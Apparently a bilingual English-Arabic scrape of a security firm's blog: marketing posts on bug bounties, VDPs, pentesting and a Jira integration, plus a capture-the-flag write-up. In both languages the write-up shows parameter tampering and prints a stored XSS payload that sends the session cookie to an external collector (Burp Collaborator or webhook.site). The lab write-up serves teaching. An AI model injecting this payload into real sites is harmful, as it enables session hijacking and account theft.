Determining whether to implement a bug bounty program, a VDP, or both depends on various factors. Organizations starting with a VDP often seek a simple means of receiving reports from third parties or complying with government regulations. Conversely, organizations opting for bug bounties are typically more advanced, aiming to incentivize hackers to actively search for vulnerabilities in their applications, e-commerce sites, or cloud infrastructure.Organizations with both a bug bounty program and a VDP will likely have different scopes for each. For example, all web domains may be in the scope of a VDP, where only certain applications will be part of the bug bounty. VDPs provide wide coverage, while bug bounties encourage targeted testing.

&nbsp;

<h2>What Are Public and Private Programs?&nbsp;</h2>

Public and private programs refer to the accessibility of the programs to participants. Public programs enable anyone to submit reports and are commonly listed in directories or on the organization&#39;s website. In contrast, private programs restrict submissions to selected individuals, providing more control and preserving confidentiality. Organizations often begin with a private program to manage submission volumes and safeguard vulnerabilities before expanding into a public program to encourage broader participation and coverage.&nbsp;

&nbsp;

<h2>Why Make a Program Private?&nbsp;</h2>

Organizations may start with a private program to ensure their internal resources can handle the submission volume. It also protects them from revealing vulnerabilities to an unknown range of finders. Private programs are suitable for sensitive assets requiring strict access controls or new assets requiring testing before a public release. In some cases, organizations may want submissions only from hackers with specific expertise. Private VDPs can be appropriate when organizations only want to hear about vulnerabilities from partners or customers.

&nbsp;

Bug bounties and VDPs are valuable tools for organizations to receive vulnerability reports and enhance their security. Choosing between bug bounties, VDPs, or a combination of both, as well as deciding whether to make the program public or private, depends on an organization&#39;s specific goals, attack surface understanding, risk tolerance, and other factors shaping their overall security strategy. To effectively manage attack resistance, Trustline offers solutions such as Trustline Bounty and Trustline Disclosure, facilitating the identification of critical vulnerabilities and closing security gaps.

&nbsp;

Trustline is the first security platform that combines hackes with businesses. If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and <a href="mailto:https://www.trustline.sa/contact-us">contact us</a> today to launch your first bug bounty program.

برامج مكافأة الثغرات وبرامج الافصاح عن الثغرات هي برامج تتبناها الشركات في جميع أنحاء العالم. ومع ذلك، لا يزال العديد من الأشخاص يجدون صعوبة في فهم كيفية استخدامها بشكل مناسب والفروقات بينهما. يهدف هذا المقال إلى توضيح مفهوم برامج مكافأة الثغرات وبرامج الافصاح عن الثغرات واستكشاف أوجه التنوع بين البرامج العامة والخاصة.

&nbsp;

<h2 dir="rtl">ما هي الاختلافات بين برامج مكافأة الثغرات وبرامج الافصاح عن الثغرات؟</h2>

تشترك برامج مكافأة الثغرات وبرامج الافصاح عن الثغرات في هدف مشترك، وهو جمع تقارير الثغرات من طرف ثالث، بما في ذلك الباحثين الأمنيين في مجال الأمن السيبراني، والهاكرز الأخلاقيين. تتضمن هذه البرامج نطاق محدد للاختبار، وعملية تقديم تقارير واضحة ومفصلة (عادةً من خلال نموذج ويب)، وآلية للتقييم والاستجابة لهذه التقارير. تهدف هذه البرامج إلى ضمان وجود آلية معينة للأطراف الثالثة تسمح لهم بتقديم التقارير عن الثغرات التي يجدونها وضمان وصولها للأشخاص المعنيين.&nbsp;يكمن الاختلاف الرئيسي بين برامج مكافأة الثغرات وبرامج الإفصاح عن في آلية الحوافز. تقدم برامج مكافأة الثغرات مكافآت مالية للتقارير الصحيحة، مما يحفز الأفراد على تقديم التقارير عن الثغرات. بينما تعبر برامج الإفصاح عن الثغرات في المقام الأول عن الامتنان والتقدير تجاه المكتشفين، حيث يُعتبر تقديمهم للثغرات مساهمة تطوعية. على الرغم من أن بعض برامج قد تقدم رموز تقدير بسيطة مثل السلع التذكارية، التي تعد لفتات شكر بدلاً من الحوافز المالية.

&nbsp;

<h2 dir="rtl">كيف تقرر ما هو الافضل لك برنامج مكافأة الثغرات، أو برنامج الافصاح عن الثغرات، أو كلاهما؟&nbsp;</h2>

تسعى الشركات التي تبدأ ببرنامج الإفصاح عن الثغرات إلى الحصول على وسيلة بسيطة لاستقبال التقارير الأمنية من الأطراف الثالثة أو الامتثال للتشريعات الحكومية. وعلى العكس من ذلك، تختار المؤسسات التي تنفذ برامج مكافأة الثغرات مستوىً متقدمًا، بهدف تحفيز الهاكرز الأخلاقيين على البحث النشط عن الثغرات في تطبيقاتها و جميع أصولها الرقمية.من المرجح أن تكون لدى الشركات التي تمتلك برنامج مكافأة الثغرات وبرنامج الإفصاح عن الثغرات نطاقات مختلفة لكل منهما. على سبيل المثال، قد يكون جميع نطاقات الويب ضمن نطاق برنامج الافصاح، في حين تكون تطبيقات معينة اكثر حساسية فقط جزءًا من برامج المكافأة. توفر برامج الافصاح تغطية واسعة، بينما تشجع برامج المكافأة على الاختبار المستهدف.&nbsp;

&nbsp;

<h2 dir="rtl">ما هي البرامج العامة والخاصة؟&nbsp;</h2>

البرامج العامة والخاصة تشير إلى إمكانية الوصول إلى البرامج من قبل المشاركين. تتيح البرامج العامة لأي شخص تقديم التقارير، وعادة ما يتم إدراجها على موقع الشركة. بالمقابل، تقيد البرامج الخاصة تقديم التقارير لأفراد محددين فقط، مما يوفر المزيد من التحكم والحفاظ على السرية. في كثير من الأحيان، تبدأ الشركات ببرنامج خاص لإدارة حجم التقارير وحماية الثغرات قبل التوسع في برنامج عام لتشجيع المشاركة والتغطية الأوسع.

&nbsp;

<h2 dir="rtl">لماذا تجعل البرنامج خاصًا؟ وما هو المغزى من البرامج الخاصة؟&nbsp;</h2>

قد تبدأ الشركات ببرنامج خاص لضمان قدرة مواردها الداخلية على التعامل مع حجم التقارير. تعتبر البرامج الخاصة مناسبة للأصول الحساسة التي تتطلب ضوابط وصول صارمة أو الأصول الجديدة التي تتطلب اختبارًا قبل الاطلاق العام. في بعض الحالات، قد ترغب الشركات في تلقي التقارير فقط من الهاكرز ذوي خبرات محدده.

&nbsp;

ترست لاين تساهم في رفع مستوى الامان لدى المنشات من خلال جمعهم مع مجتمع من الباحثين الامنيين. إذا كنت ترغب في متابعة آخر الأخبار، يمكنك متابعتنا على وسائل التواصل الاجتماعي مثل <a href="http://twitter.com/TrustlineSec">تويتر</a> و<a href="http://www.linkedin.com/company/trustlinesec/">لينكد إن</a>، ويمكنك <a href="https://www.trustline.sa/ar/contact-us">التواصل معنا</a> للاطلاع على حلولنا.

Exploring the Differentiation Between Public and Private Bug Bounties and Vulnerability Disclosure Programs

معرفة الاختلاف ما بين برامج مكافئة الثغرات الخاصه و العامه و برامج الكشف عن الثغرات

Understanding-bugbounty-vdp

Bug bounties and Vulnerability Disclosure Programs (VDPs) are widely embraced by organizations worldwide.

برامج مكافأة الثغرات وبرامج الافصاح عن الثغرات هي برامج تتبناها الشركات في جميع أنحاء العالم. ومع ذلك، لا يزال العديد من الأشخاص يجدون صعوبة في فهم كيفية استخدامها بشكل مناسب والفروقات بينهما.

<h2>Challenge ovierview:</h2>

FitnessZone is a hard-level challenge with the desciption &ldquo;Your best health and wellness starts with a Fitness Zone membership. Feel amazing every day with a fitness membership that fits around your lifestyle. It is a web-based challenge that requires specific skills, including a solid understanding of the OWASP Top 10.&nbsp; In this challenge, I conducted a series of steps to exploit vulnerabilities within a web application. The goal was to escalate privileges from a Bronze-level user to Silver and, ultimately, gain access to the coveted &#39;Gold&#39; membership level, where the flag could be retrieved. This report outlines the steps taken and the vulnerabilities identified. Technical approach:

Technical approach:

I examined the source page to search for any JavaScript or comments, but it consisted solely of clear HTML/CSS with no JavaScript scripts included. During the assessment, I intercepted the registration request for the web application. In this request, I discovered a parameter named &#39;membership&#39; that appeared to dictate the user&#39;s membership level. In an attempt to upgrade my membership from &#39;Bronze&#39; to &#39;Silver,&#39; I manipulated the &#39;membership&#39; parameter value. 

However, the application promptly responded with the message, &quot;Only Bronze membership is available for now,&quot; indicating that a direct modification of membership was not allowed.

<img alt="" src="/media/blog/2024/02/18/one.png" style="height:539px; width:494px" />

Persistently, I continued my efforts by modifying the &#39;membership&#39; parameter value to &#39;Silver.&#39; This manipulation successfully granted me &#39;Silver&#39; membership status, prompting the message, &quot;You are a Silver Level User. Upgrade To Access Premium Features

<img alt="" src="/media/blog/2024/02/18/two.png" style="height:599px; width:731px" />

&nbsp;

<img alt="" src="/media/blog/2024/02/18/three.png" style="height:505px; width:566px" />

Exploring the application, I came across the &#39;Apply For Gold&#39; button. By clicking on this button, I was presented with fields for providing a name and a description for my Gold membership application.

<img alt="" src="/media/blog/2024/02/18/four.png" style="height:367px; width:485px" />

&nbsp;

XSS via CSRF Exploitation

Given the opportunity to provide a name and description and visite by admin, I identified a potential vulnerability. I suspected that the application might be susceptible to Cross-Site Scripting (XSS) attacks stored via Cross-Site Request Forgery (CSRF).

Crafting the XSS Payload

<ul>
	<li>To test my hypothesis, I created an XSS payload using JavaScript to exfiltrate the user&#39;s session cookie:</li>
</ul>

<kbd><code>```bash</code></kbd>

<kbd><code>&lt;script&gt;</code></kbd>

<kbd><code>&nbsp;&nbsp; document.write(&#39;&lt;img src=&quot;[URL]?c=&#39; + document.cookie + &#39;&quot; /&gt;&#39;);</code></kbd>

<kbd><code>&nbsp;&lt;/script&gt;</code></kbd>

<kbd><code>```</code></kbd>

<ul>
	<li>I ensured that the &#39;[URL]&#39; was set to either Burp Collaborator (for users with BurpSuite Pro) or &quot;https://webhook.site&quot; for those without BurpSuite Pro. </li>
</ul>

Payload Injection

<ul>
	<li>I proceeded to inject the crafted payload into all available fields, namely &#39;name&#39; and &#39;description,&#39; and submitted the Gold membership application.</li>
</ul>

<img alt="" src="/media/blog/2024/02/18/five.png" style="height:459px; width:390px" />

Confirmation of Successful Submission

<ul>
	<li>The application responded with the message, &#39;Request submitted successfully. Admin will take a look at it soon,&#39; indicating that the request was saved and pending review by the admin. Flag Retrieval </li>
	<li>Upon successful execution of the XSS payload, I received a callback on the chosen platform (Burp Collaborator or &quot;https://webhook.site&quot;). This callback provided access to the coveted flag.</li>
</ul>

<img alt="" src="/media/blog/2024/02/18/six.png" style="height:229px; width:680px" />

<h2>Conclusion:</h2>

This CTF challenge demonstrated the exploitation of a combination of vulnerabilities to elevate privileges and gain unauthorized access within the web application. The critical vulnerabilities identified included Inadequate input validation allowing manipulation of the &#39;membership&#39; parameter. A potential Cross-Site Scripting (XSS) vulnerability stored via Cross-Site Request Forgery (CSRF). The successful exploitation of these vulnerabilities allowed for the retrieval of the flag, highlighting the importance of robust security testing and measures in web application development. This exercise serves as a valuable reminder of the importance of addressing security flaws proactively and continuously to protect web applications against real-world attacks.

نظرة عامة على التحدي:

يعتبر FitnessZone تحديًا من الصعب تخطيه مع الوصف &quot;تبدأ صحتك ورفاهيتك الأفضل مع عضوية في Fitness Zone. اشعر بتحسن كل يوم مع عضوية للياقة البدنية تناسب نمط حياتك.&quot;&nbsp; إنه تحدي قائم على الويب يتطلب مهارات محددة ، بما في ذلك فهم جيد لأفضل 10 مشاكل في OWASP. في هذا التحدي ، قمت بتنفيذ سلسلة من الخطوات لاستغلال الثغرات داخل تطبيق ويب. كان الهدف هو تصعيد الامتيازات من مستخدم بمستوى برونزي إلى فضي وبالتالي الحصول على وصول إلى مستوى العضوية &#39;الذهبية&#39; المرغوب فيه، حيث يمكن استرجاع العلم. يوضح هذا التقرير الخطوات التي تم اتخاذها والثغرات المحددة.

<h2 dir="rtl">النهج التقني:</h2>

قمت بفحص صفحة المصدر للبحث عن أي JavaScript أو تعليقات ، ولكنها كانت تتألف فقط من HTML/CSS واضح بدون أي سكريبتات JavaScript مدرجة خلال التقييم ، قمت بالتقاط طلب التسجيل لتطبيق الويب. في هذا الطلب ، اكتشفت معلمة تسمى &#39;العضوية&#39; التي بدت كما لو كانت تحدد مستوى عضوية المستخدم.

في محاولة لرفع مستوى عضويتي من &#39;برونزية&#39; إلى &#39;فضية&#39; ، قمت بتلاعب قيمة معلمة &#39;العضوية&#39;. ومع ذلك ، رد التطبيق بسرعة بالرسالة &quot;العضوية البرونزية متاحة فقط الآن&quot; ، مشيرًا إلى أن التعديل المباشر للعضوية لم يكن مسموحًا.

<img alt="" src="/media/blog/2024/02/18/one.png" style="height:539px; width:494px" />

بصمود ، واصلت جهودي بتعديل قيمة معلمة &#39;العضوية&#39; إلى &#39;فضية&#39;. نجح هذا التلاعب في منحي حالة عضوية &#39;فضية&#39; ، مما دفع الرسالة &quot;أنت عضو فضي. قم بالترقية للوصول إلى الميزات المميزة

<img alt="" src="/media/blog/2024/02/18/two.png" style="height:599px; width:731px" />

&nbsp;

<img alt="" src="/media/blog/2024/02/18/three.png" style="height:505px; width:566px" />

أثناء استكشاف التطبيق ، وجدت زر &quot;التقدم بطلب للحصول على الذهب&quot;. بالنقر فوق هذا الزر ، تم عرض حقول لتقديم اسم ووصف لطلب عضوية الذهب.

<img alt="" src="/media/blog/2024/02/18/four.png" style="height:367px; width:485px" />

&nbsp;

XSS عبر استغلال CSRF

بناءً على الفرصة المتاحة لتقديم اسم ووصف وزيارة من قبل المسؤول ، تمكنت من تحديد ثغرة محتملة. اشتبهت في أن التطبيق قد يكون عرضة لهجمات Cross-Site Scripting (XSS) المخزنة عبر Cross-Site Request Forgery (CSRF).

صياغة حمولة XSS

لاختبار فرضيتي ، قمت بإنشاء حمولة XSS باستخدام JavaScript لسرقة ملف تعريف الجلسة للمستخدم:

```bash

&lt;script&gt;

&nbsp;&nbsp; document.write(&#39;&lt;img src=&quot;[URL]?c=&#39; + document.cookie + &#39;&quot; /&gt;&#39;);

&nbsp;&lt;/script&gt;

```

ضمنت أن &#39;[URL]&#39; تم تعيينه إما على Burp Collaborator (للمستخدمين الذين يمتلكون BurpSuite Pro) أو &quot;<a href="https://webhook.site/" target="_new">https://webhook.site</a>&quot; لأولئك الذين لا يمتلكون BurpSuite Pro.

حقن الحمولة

واصلت في حقن الحمولة المصممة في جميع الحقول المتاحة ، وهي &#39;الاسم&#39; و &#39;الوصف&#39; ، وقدمت طلب عضوية الذهب.

<img alt="" src="/media/blog/2024/02/18/five.png" style="height:459px; width:390px" />

&nbsp;

تأكيد الإرسال الناجح

رد التطبيق برسالة &quot;تم إرسال الطلب بنجاح. سيقوم المسؤول بالنظر فيه قريبًا&quot; ، مما يشير إلى أن الطلب تم حفظه وفي انتظار مراجعة من قبل المسؤول.

استرجاع العلم

بعد تنفيذ الحمولة XSS بنجاح ، تلقيت ردًا على المنصة المختارة (Burp Collaborator أو &quot;<a href="https://webhook.site/" target="_new">https://webhook.site</a>&quot;). هذا الرد قدم وصولًا إلى العلم المرغوب فيه.

<img alt="" src="/media/blog/2024/02/18/six.png" style="height:229px; width:680px" />

الاستنتاج:

أظهر هذا التحدي في CTF استغلال مزيج من الثغرات لرفع مستوى الامتيازات والحصول على وصول غير مصرح به داخل تطبيق الويب. تشمل الثغرات الحرجة المحددة: عدم كفاية التحقق من الإدخال مما يسمح بالتلاعب بمعلمة &#39;العضوية&#39;. ثغرة محتملة في Cross-Site Scripting (XSS) المخزنة عبر Cross-Site Request Forgery (CSRF). نجح استغلال هذه الثغرات في استرجاع العلم ، مما يبرز أهمية اختبار الأمان القوي والتدابير في تطوير تطبيقات الويب. يعتبر هذا التمرين تذكيرًا قيمًا بأهمية معالجة العيوب الأمنية بشكل نشط ومستمر لحماية تطبيقات الويب من هجمات العالم الحقيقي.

FitnessZone-Challenge

The FitnessZone challenge involved exploiting vulnerabilities in a web application to escalate user privileges and gain unauthorized access.

تضمن تحدي FitnessZone استغلال الثغرات في تطبيق ويب لتصعيد امتيازات المستخدم والحصول على وصول غير مصرح به.

FitnessZone Challenge Writeup

حل تحدي FitnessZone

Trustline is excited to announce the integration of Jira, a powerful project management and issue tracking tool, into its&nbsp;platform. This integration brings added value and benefits to our valued partners, empowering them in their cybersecurity efforts.

&nbsp;

The integration with Jira offers the following advantages:

1. Efficient Issue Tracking: Jira&#39;s robust issue tracking capabilities enable partners to manage vulnerabilities, bugs, and findings seamlessly. Partners can easily create, prioritize, and track issues within Jira, gaining complete visibility into their security posture and progress.

2. Automated Workflows: Our Jira integration automates various cybersecurity workflows, eliminating manual processes and reducing potential errors. This integration ensures that vulnerability findings, remediation tasks, and security-related updates are synchronized between Trustline&#39;s products and partners&#39; Jira instances, streamlining the resolution of security issues.

3. Centralized Documentation: Jira serves as a centralized repository for all cybersecurity-related documentation, including vulnerability reports, remediation plans, and progress updates. Partners can easily access and reference this information, promoting transparency and accountability throughout the security assessment process.

4. Seamless Task Management: With Jira integration, partners can efficiently manage and track tasks related to vulnerability remediation. They can assign tasks, set due dates, and monitor progress, ensuring timely resolution of security issues and reducing the risk of potential vulnerabilities.&nbsp;

&nbsp;

At Trustline, we are committed to providing our partners with the tools and capabilities they need to safeguard their digital assets. Our Jira integration strengthens this commitment by offering streamlined efficient issue tracking and automation. These capabilities empower our partners to bolster their security measures and achieve greater efficiency. To learn more about the specific benefits and how our Jira integration can support your organization, reach out to us today and follow us on social media&nbsp;<a href="http://twitter.com/TrustlineSec">Twitter</a>&nbsp;and&nbsp;<a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;to stay updated on our latest news.

يسعدنا أن نعلن عن إضافة جديدة إلى منصتنا وهي الربط مع &laquo;جيرا&raquo;، التي تعد أداة قوية لإدارة المشاريع وتتبع المشكلات. يساهم هذا الربط بإضافة قيمة لشركائنا في المنصة، وتمكين جهودهم في تعزيز أمنهم السيبراني.

يوفر الربط مع &laquo;جيرا&raquo; العديد من المزايا منها:

1.تتبع المشكلات بكفاءة: نمكّن شركائنا من تتبع المشكلات وإدارة الثغرات والأخطاء بسلاسة من خلال هذا الربط. حيث يمكن تحديد المشكلات والأولويات وتتبعها داخل &laquo;جيرا&raquo; بكل سهولة والحصول على رؤية كاملة لوضعهم وتقدمهم الأمني.

2.تمكين سير عمل آلي: يعمل الربط مع &laquo;جيرا&raquo; على أتمتة العديد من أعمال الأمن السيبراني، مما يؤدي إلى التخلص من العمليات اليدوية وتقليل الأخطاء المحتملة بالإضافة الى سلاسة الاستخدام. يضمن هذا الربط مزامنة نتائج الثغرات الأمنية والتحديثات المتعلقة بمعالجة الثغرات بين ترست لاين و &laquo;جيرا&raquo;.

3.توثيق مركزي: يعد الربط مع جيرا بمثابة مستودع مركزي لجميع الوثائق المتعلقة بالأمن السيبراني للمنشأة، بما في ذلك تقارير الثغرات الأمنية وخطط إصلاحها. يساهم هذا الربط في الوصول إلى هذه المعلومات بكل سهولة.

4.إدارة المهام بسلاسة: إدارة وتتبع المهام المتعلقة بمعالجة الثغرات الأمنية اصبح افضل الان. يوفر هذا الربط سهولة تعيين المهام ومراقبة التقدم، مما يساعد على حل المشكلات الأمنية في الوقت المناسب وتقليل المخاطر المحتملة.

&nbsp;

في ترست لاين، نلتزم بتزويد شركائنا بالأدوات والإمكانيات التي تدعمهم لحماية أصولهم الرقمية. تعمل هذه الميزه على تمكين شركائنا من تعزيز إجراءاتهم الأمنية وتحقيق قدر أكبر من الكفاءة. لمعرفة المزيد حول المزايا المحددة وكيف يمكن للربط مع &laquo;جيرا&raquo; أن يدعم منشأتك، تواصل معنا الآن وكن على اطلاع بآخر أخبارنا على منصات التواصل الإجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec">تويتر</a> و<a href="https://www.linkedin.com/company/trustlinesec/">لينكد إن</a>.

Empowering-partners-with-streamlined-task-management-through-Jira-integration

In a mission to empowering our partners to be more efficient and productive, we announced the integration with Jira..

في مهمة تهدف إلى تمكين شركائنا ليكونوا أكثر كفاءة وإنتاجية، نعلن عن الربط مع جيرا..

Empowering partners with streamlined task management through Jira integration

تمكين شركائنا من إدارة المهام بكل سلاسة عن طريق الربط مع جيرا

<h2>Understanding Penetration Testing</h2>

Penetration testing, often referred to as pentesting, is a widely used method to meet security regulations and safeguard networks, computer systems, and users.

During a pentest, authorized hackers simulate attacks on specific applications, networks, or sites to evaluate their security. The primary objective of a pentest is to identify and exploit vulnerabilities in a system, network, or application to assess its security posture.

&nbsp;

<h2>Comparing Traditional and Hacker-Powered Pentests</h2>

Traditional penetration testing involves one or a few pentesters conducting tests and generating a report for a fee. These reports can be costly, and their pricing doesn&rsquo;t change based on the number or severity of the vulnerabilities found. Many experts believe that traditional pentesting is becoming obsolete.

Hacker-powered pentests are becoming a more cost-effective approach to enhancing application security. With Trustline Assessment, we invite selected pentesters from our our hacker community to identify vulnerabilities in your systems, leveraging a large and dynamic talent pool.

&nbsp;

<img alt="" src="/media/blog/2024/06/25/coma_assessment-1.png" style="height:10472px; width:12532px" />

<h2>5 Key Considerations When Choosing a Penetration Testing Company</h2>

<ol>
	<li>Transparency in the Testing Process

	Traditional pentesting often lacks transparency, leaving customers in the dark about the engagement&#39;s progress. Critical vulnerabilities may not be communicated efficiently, and remediation workflows might not be integrated. It&#39;s essential to choose a vendor that offers clear visibility throughout the testing process.

	Trustline ensures that companies can respond to vulnerabilities as they are identified, offering insight into the pentest&#39;s progress from start to finish. This transparency helps accelerate remediation and reduces overall costs.
	</li>
	<li>Integration with Your SDLC
	Often, the focus of a pentest is on the final report, which can be lengthy and unclear about remediation priorities. A good pentest platform should integrate seamlessly with the software development lifecycle (SDLC), ensuring that findings are directed to the appropriate developers for prompt resolution.

	Trustline provides unmatched integration capabilities with tools like Jira, ,and Slack, facilitating swift and effective remediation.
	</li>
	<li>Diverse and Collaborative Pentesters
	Traditional firms usually deploy one to three pentesters, who are often entry-level, and customer interaction is minimal.

	At Trustline, we value collaboration and discussion. Each pentest team consists of 1-5 testers who engage directly with customers via our platform. This approach ensures that a diverse range of skills and experiences is applied to each engagement.
	</li>
	<li>Timeliness of Delivery
	The speed at which a pentest is completed can vary significantly among vendors. Some require long lead times, while others may charge extra for expedited services. It&#39;s important to know your timelines and how quickly you need results.

	Trustline can leverage its extensive hacker community to begin testing within few days, depending on the readiness of the testing environment.
	</li>
	<li>Alignment with Long-term Security Goals
	When selecting a security vendor, consider your long-term security objectives. How frequently do you need pentests? What compliance requirements must be met? Are you seeking a comprehensive, ongoing security strategy? Different vendors may offer advantages in either point-in-time or continuous testing.

	Trustline encourages customers to view pentesting as part of a broader, long-term security strategy. By integrating Trustline Bounty or enhancing an existing program, you can manage vulnerabilities comprehensively, beyond single-point tests.
	</li>
</ol>

&nbsp;

If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and To learn more or to start a Trustline Pentest, <a href="https://www.trustline.sa/contact-us">contact us</a> today to launch your first pentest program.

<h2>فهم أختبار الأختراق بشكل افضل</h2>

اختبار الاختراق، هو نهج يُعتمد عليه بشكل واسع لضمان تطبيق معايير الأمن السيبراني وحماية شبكاتك وأنظمتك الرقمية ومستخدميها.

خلال عملية اختبار الاختراق، يقوم مختبري الأختراق بمحاكاة دور المخترقين لاكتشاف نقاط الضعف والثغرات على التطبيقات أو الشبكات أو مواقع محددة لتقييم فعالية قوة دفاعاتها الأمنية. والهدف الأساسي من اختبار الاختراق قد يكون اختبار قوة دفاعات الانظمه بشكل عام.

&nbsp;

<h2>مقارنة اختبار الاختراق التقليدي مقابل اختبار ترست لاين اسسمنت</h2>

تعتمد اختبارات الاختراق التقليدية على عدد قليل من مختبرين الاختراق لإجراء الفحص وإنشاء تقرير مفصل مقابل رسوم مالية محددة. لكن هذه التقارير قد تكون مُكلفة للغاية، كما أن تكلفتها لا تتناسب مع حجم أو مدى خطورة الثغرات الأمنية المكتشفة. يرى العديد من الخبراء أن منهجية اختبارات الاختراق التقليدية أصبحت غير فعالة إلى حد ما.

اختبار الاختراق مع ترست لاين اسسمنت فهي منهجية أكثر فعالية من حيث التكلفة لتعزيز أمن الأصول الرقمية. مع اختبار ترست لاين اسسمنت، نعمل مع نخبة من مختبري الاختراق من مجتمع ترست لاين للهاكرز للكشف عن الثغرات الأمنية في أنظمتك، وذلك من خلال الاستفادة من خبراتهم المُتميزة والمتنوعة في مختلف مجالات الأمن السيبراني.

&nbsp;

<img alt="" src="/media/blog/2024/06/25/coma_assessmentar.png" style="height:5236px; width:6266px" />

<h2>خمس نقاط رئيسية يجب مراعاتها عند اختيار شركة لاختبار الاختراق</h2>

<ol>
	<li>
	الشفافية التامة خلال عملية اختبار الاختراق

	غالبًا ما تفتقر اختبارات الاختراق التقليدية إلى الشفافية، مما يترك العملاء في حيرة بشأن سير العمل. وقد لا يتم إبلاغهم بالثغرات الأمنية الحرجة بكفاءة، كما أن إجراءات التصحيح قد لا تُدمج بشكل فعال مع الية عمل المنشأة. لذلك، من الضروري اختيار شركة تزودك برؤية واضحة على مدار عملية الاختبار بأكملها.

	تضمن لك ترست لاين إمكانية الاستجابة للثغرات الأمنية فور اكتشافها، مع تزويدك بتحديثات مستمرة حول تقدم اختبار الاختراق مرحلة مرحلة من البداية إلى النهاية. تساعد هذه الشفافية على تسريع عملية التصحيح وتقليل التكاليف العامة.
	</li>
	<li>التكامل السلس مع دورة حياة تطوير البرمجيات
	في كثير من الأحيان، يركز اختبار الاختراق التقليدي على التقرير النهائي الذي قد يكون مطولًا ويفتقر إلى تحديد أولويات التصحيح. يجب أن تتكامل منصة اختبار الاختراق مع دورة حياة تطوير البرمجيات بشكل سلس، مما يضمن توجيه النتائج إلى المطورين لإيجاد حلول سريعة للثغرات الاكثر خطورة.

	تتيح لك ترست لاين إمكانيات تكامل لا مثيل لها مع أدوات مثل &lt;Jira&gt;, &lt;Slack&gt; مما يسهّل عملية التصحيح السريع والفعال.
	</li>
	<li>فريق اختبار اختراق متنوع وذو خبرة
	عادةً ما تعتمد الشركات التقليدية على مختبر اختراق واحد أو اثنين، وغالبًا ما يكونون من المبتدئين، مع تفاعل ضعيف ينعكس سلباً على جودة التواصل مع العملاء.

	في ترست لاين، نؤمن بأهمية التعاون والنقاش البناء. يتكون كل فريق اختبار اختراق لدينا من 1 إلى 5 خبراء يتفاعلون بشكل مباشرة مع العملاء من خلال منصتنا. وتضمن هذه المنهجية الاستفادة من مجموعة واسعة من المهارات والخبرات في كل عملية اختبار اختراق.
	</li>
	<li>سرعة إنجاز الاختبارات
	يمكن أن يختلف الوقت المستغرق لإتمام اختبار الاختراق بشكل كبير بين الشركات. حيث يطلب بعضها مهلة زمنية طويلة، بينما قد يفرض البعض الآخر رسومًا إضافية للخدمات المُعجلة. لذلك، من المهم أن تعرف جداولك الزمنية ومدى السرعة التي تحتاج فيها إلى النتائج.

	بفضل مجتمعنا الواسع من مختبرين الاختراق، يمكن لـ ترست لاين أن تبدأ عملية الاختبار في غضون أيام قليلة، وذلك وفقًا لمدى جاهزية بيئة الاختبار .
	</li>
	<li>مواءمة اختبار الاختراق مع استراتيجية الأمنية للمنشأة
	عند اختيار شركة مختصة بحماية أصولك الرقمية، من الضروري أن تضع في عين الاعتبار أهداف الأمن على المدى الطويل. يجب عليك ان تسأل نفسك الاسئلة الاتيه، كم مرة ترغب بإجراء اختبارات اختراق دورية؟ وما هي معايير الامتثال التي يتعين عليك تحقيقها؟ هل تبحث عن نهج أمني شامل ومستمر يحمي منظومتك بشكل دائم؟ .

	في ترست لاين، لا ننظر إلى اختبارات الاختراق على أنها إجراءات معزولة وفردية، بل نؤمن بأنها ركيزة أساسية ضمن استراتيجية الأمن السيبراني سواءً من خلال دمج برامج مكافآت الثغرات الأمنية من ترست لاين، يمكنك إدارة الثغرات الأمنية بشكل استباقي وشامل، متجاوزًا الاعتماد على اختبارات الاختراق التقليديه.
	</li>
</ol>

&nbsp;

يمكنك متابعتنا على وسائل التواصل الاجتماعي مثل <a href="http://twitter.com/TrustlineSec">تويتر</a> و<a href="http://www.linkedin.com/company/trustlinesec/">لينكد إن</a>، ساهم في حماية منشأتك و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> للاستفادة من برنامج اختبار الاختراق كخدمة

Key Factors to Consider When Choosing a Penetration Testing Company

العوامل الرئيسية التي يجب مراعاتها عند اختيار شركة لاختبار الاختراق

Key-Factors-to-Consider-When-Choosing-a-Penetration-Testing-Company

Traditional penetration testing involves one or a few pentesters conducting tests and generating a report for a fee. These reports can be costly, and their pricing doesn’t change based on the number or severity of the vulnerabilities found. Many experts believe that traditional pentesting is becoming obsolete.

تعتمد اختبارات الاختراق التقليدية على عدد قليل من مختبرين الاختراق لإجراء الفحص وإنشاء تقرير مفصل مقابل رسوم مالية محددة. لكن هذه التقارير قد تكون مُكلفة للغاية، كما أن تكلفتها لا تتناسب مع حجم أو مدى خطورة الثغرات الأمنية المكتشفة. يرى العديد من الخبراء أن منهجية اختبارات الاختراق التقليدية أصبحت غير فعالة إلى حد ما.

In today&rsquo;s digital age, cybersecurity challenges are a given. Yet, these challenges can be more than just obstacles&mdash;they can be opportunities for growth and improvement. By adopting a proactive and strategic approach, organizations can transform these hurdles into powerful drivers of innovation and resilience. Here&rsquo;s how you can turn your cybersecurity challenges into valuable opportunities for growth.

&nbsp;

<h2>Adopt a Proactive Security Mindset</h2>

The first step in turning cybersecurity challenges into growth opportunities is to shift from a reactive to a proactive security mindset. Instead of waiting for an attack to happen, organizations should anticipate potential threats and address vulnerabilities before they can be exploited. This proactive approach not only strengthens your defences but also positions your organization as a leader in cybersecurity resilience. 
We talked about this, or rather more precisely, in one of our following articles <a href="https://www.trustline.sa/blog/Preparing-for-the-Next-Cyber-Attack-How-a-Proactive-Approach-Can-Protect-Your-Brand">here</a>.

&nbsp;

<h2>Leverage Ethical Hacking for Insightful Testing</h2>

Ethical hacking, conducted by skilled security professionals, is a crucial component of a robust cybersecurity strategy. By simulating real-world cyberattacks, ethical hackers identify vulnerabilities that might not be apparent through conventional testing methods. Embracing ethical hacking can provide you with valuable insights into your security posture and help you address weaknesses before they become critical issues. This approach turns the challenge of identifying vulnerabilities into an opportunity for continuous improvement.

&nbsp;

<h2>Implement a Structured Vulnerability Reporting System</h2>

